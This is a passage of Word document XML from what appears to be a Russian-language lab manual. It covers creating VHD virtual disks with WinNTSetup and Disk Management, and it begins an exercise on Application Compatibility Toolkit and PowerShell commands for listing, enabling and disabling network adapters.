                    <a:blip r:embed="rId408" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1976606" cy="1663167"/>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Приступить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2068950" cy="1757722"/>
            <wp:effectExtent l="19050" t="0" r="7500" b="0"/>
            <wp:docPr id="284" name="Рисунок 123" descr="https://remontcompa.ru/uploads/posts/2015-09/1443119397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remontcompa.ru/uploads/posts/2015-09/1443119397_118.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId409" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2072367" cy="1760625"/>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 xml:space="preserve">Начинается процесс преобразования формата .tib в формат VHD! </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1896150" cy="967741"/>
            <wp:effectExtent l="19050" t="0" r="8850" b="0"/>
            <wp:docPr id="285" name="Рисунок 124" descr="https://remontcompa.ru/uploads/posts/2015-09/1443119419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remontcompa.ru/uploads/posts/2015-09/1443119419_104.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId410" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1896242" cy="967788"/>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Преобразование успешно завершено. ОК.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1874550" cy="554328"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="286" name="Рисунок 125" descr="https://remontcompa.ru/uploads/posts/2015-09/1443119449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remontcompa.ru/uploads/posts/2015-09/1443119449_105.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId411" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1877046" cy="555066"/>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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4). Как создать файл VHD с помощью программы WinNTSetup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>WinNTSetup очень полезная программулька (работающая без установки) и заслужила отдельный раздел на нашем сайте, создать с помощью нее файл VHD очень просто, нужно всего лишь запустить программу и нажать кнопку VHD.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1615453" cy="1411200"/>
            <wp:effectExtent l="19050" t="0" r="3797" b="0"/>
            <wp:docPr id="287" name="Рисунок 128" descr="https://remontcompa.ru/uploads/posts/2015-09/1443245615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remontcompa.ru/uploads/posts/2015-09/1443245615_128.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId412" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1615407" cy="1411160"/>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Создать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1723350" cy="976150"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27811" name="Рисунок 129" descr="https://remontcompa.ru/uploads/posts/2015-09/1443245981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remontcompa.ru/uploads/posts/2015-09/1443245981_129.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId413" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1723986" cy="976510"/>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 xml:space="preserve">Выбираем место сохранения файла VHD, размер и жмем ОК. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1266832" cy="1627200"/>
            <wp:effectExtent l="19050" t="0" r="9518" b="0"/>
            <wp:docPr id="27812" name="Рисунок 130" descr="https://remontcompa.ru/uploads/posts/2015-09/1443246027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remontcompa.ru/uploads/posts/2015-09/1443246027_130.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId414" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1270015" cy="1631288"/>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 xml:space="preserve">Файл VHD создан и уже смонтирован программой в </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Управлении дисками</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1485750" cy="836864"/>
            <wp:effectExtent l="19050" t="0" r="150" b="0"/>
            <wp:docPr id="27813" name="Рисунок 131" descr="https://remontcompa.ru/uploads/posts/2015-09/1443246003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remontcompa.ru/uploads/posts/2015-09/1443246003_132.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId415" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1485775" cy="836878"/>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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5) Создание файла VHD в Управлении дисками</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Также можно создать чистый виртуальный жесткий диск VHD (к примеру для установки на него операционной системы).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Войдите в Управление дисками и выберите:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Действие-&gt;Создать виртуальный жесткий диск.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2176950" cy="1758779"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27817" name="Рисунок 132" descr="https://remontcompa.ru/uploads/posts/2015-10/1443819496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remontcompa.ru/uploads/posts/2015-10/1443819496_38.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId416" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2177070" cy="1758876"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> Выберите место расположения виртуального диска, также выберите размер, формат, тип и нажмите ОК.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1752150" cy="2206279"/>
            <wp:effectExtent l="19050" t="0" r="450" b="0"/>
            <wp:docPr id="27819" name="Рисунок 133" descr="https://remontcompa.ru/uploads/posts/2015-10/1443819527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remontcompa.ru/uploads/posts/2015-10/1443819527_40.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId417" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1753304" cy="2207732"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00517F15" w:rsidRPr="00617AC0" w:rsidRDefault="00517F15" w:rsidP="00517F15">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="178" w:name="_Toc507788247"/>
      <w:bookmarkStart w:id="179" w:name="_Toc507788522"/>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="00517F15" w:rsidP="00517F15">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 2. </w:t>
      </w:r>
      <w:r w:rsidR="005742B0" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Решение проблем настройки ПО с помощью </w:t>
      </w:r>
      <w:r w:rsidR="00F16A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Application</w:t>
      </w:r>
      <w:r w:rsidR="00F16A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F16A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Compatibility</w:t>
      </w:r>
      <w:r w:rsidR="00F16A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F16A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Toolkit</w:t>
      </w:r>
      <w:r w:rsidR="00F16A4D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="178"/>
      <w:bookmarkEnd w:id="179"/>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков установки и настройки программного обеспечения. Решение проблемы некорректной работы программного обеспечения отраслевой направленности: использование сценариев PowerShell для настройки сетевых адаптеров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">персональный компьютер, ресурсы сети интернет. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Провести анализ программных продуктов установленных на компьютере с помощью Application Compatibility Toolkit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся скриншоты этапов выполнения работы и комментарии к ним.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Провести анализ с помощью Application Compatibility Toolkit согласно примеру из теоретической части.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В Windows Server 2012 и PowerShell 3.0 насчитывается около 250 команд управления сетевыми параметрами. Ниже приводится первая десятка общих задач, ранее решавшихся только с помощью Netsh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Список сетевых адаптеров. Основной сетевой командой является команда вывода списка сетевых адаптеров. Полезное дополнение к команде PowerShell – возможность включения дополнительного параметра –IncludeHidden для просмотра скрытых адаптеров, которые нельзя увидеть в графическом интерфейсе. Необходимая команда PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Get-NetAdapater</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Включение и выключение адаптеров. Очередная важная функция управления, которую можно выполнять с помощью PowerShell 3.0 – включение и выключение сетевого адаптера. На серверах необходимость в этом возникает редко, но на ноутбуках и планшетах такая возможность удобна при возникновении проблем с подключением к различным сетям. Эту задачу можно решить с помощью следующих команд:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Disable</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NetAdapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wireless</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Connection</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable-NetAdapter -Name </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wireless Network Connection</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
